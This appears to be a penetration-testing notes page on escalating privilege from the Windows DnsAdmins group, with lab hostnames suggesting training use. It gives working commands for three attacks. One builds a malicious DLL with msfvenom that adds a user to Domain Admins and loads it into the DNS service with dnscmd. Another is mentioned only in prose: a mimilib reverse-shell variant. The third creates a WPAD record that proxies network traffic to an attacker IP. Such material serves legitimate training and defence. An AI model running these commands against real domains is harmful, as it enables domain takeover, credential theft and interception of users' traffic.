DnsAdmins

Members of the DnsAdmins group have access to DNS information on the network. The Windows DNS service is runned by supports custom plugins (.dll) and can call functions from them to resolve name queries that are not in the scope of any locally hosted DNS zones.

If we are members of DnsAdmins we can leverage the DNS plugins for privesc.

Attack 1: DNS service is running on Domain Controller

Overview of the attack. See this blog post for more details => https://adsecurity.org/?p=4064

DNS management is performed over RPC
ServerLevelPluginDll allows us to load a custom DLL with zero verification of the DLL's path. This can be done with the dnscmd tool from the command line
When a member of the DnsAdmins group runs the dnscmd command below, the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll registry key is populated
When the DNS service is restarted, the DLL in this path will be loaded (i.e., a network share that the Domain Controller's machine account can access)
An attacker can load a custom DLL to obtain a reverse shell or even load a tool such as Mimikatz as a DLL to dump credentials.

First we can generate a malicious DLL plugin to add a user to the domain admins group using msfvenom. Replace <USER> by your user.

msfvenom -p windows/x64/exec cmd='net group "domain admins" <USER> /add /domain' -f dll -o adduser.dll

Next we transfer it to the DC and then load it to the DNS service:

dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll

Then we must restart the DNS service. Members of DnsAdmins cant do this by default, so we might have to wait for the service to be restarted or find another way to restart it.

To check if we have restart permissions, first we get the SID of our user:

wmic useraccount where name="<USER>" get sid

Then we check the DACL of the service:

sc.exe sdshow DNS

If we find something like that it means we can restart the service

(A;;RPWP;;;S-1-5-21-669053619-2741956077-1013132368-1109)

S-1-5-21-669053619-2741956077-1013132368-1109 is our SID
R: Read (SERVICE_QUERY_CONFIG)
P: Pause or Continue (SERVICE_PAUSE_CONTINUE)
W: Write (SERVICE_CHANGE_CONFIG)
P: Start (SERVICE_START)

We restart the service.

Do it from cmd.exe not powershell (for some reason it didn't work using powershell)

sc stop dns
sc start dns

We can confirm we are now members of domain admins:

net group "Domain Admins" /dom

After we must log out and log back in to get a new token with our new privileges inherited from the domain admins group.

Attack 2: Mimilib.dll

As detailed in this post, we could also utilize mimilib.dll from the creator of the Mimikatz tool to gain command execution by modifying the kdns.c file to execute a reverse shell one-liner or another command of our choosing.

Attack 3: Creating a WPAD Record

A WPAD (Web Proxy Auto-Discovery) record is a DNS or DHCP configuration that allows client computers on a network to automatically discover the URL of a PAC (Proxy Auto-Configuration) file.

After disabling the global query block list and creating a WPAD record, every machine running WPAD with default settings will have its traffic proxied through our attack machine.

First we disable the global query block list:

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local

Then we add our WPDA entry to proxy all traffic to us:

Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3

In both commands make sure to replace dc01.inlanefreight.local to the DNS server address and 10.10.14.3 to your attacking ip.

PreviousEvent Log Readers NextHyper-V Administrators

Last updated 2 years ago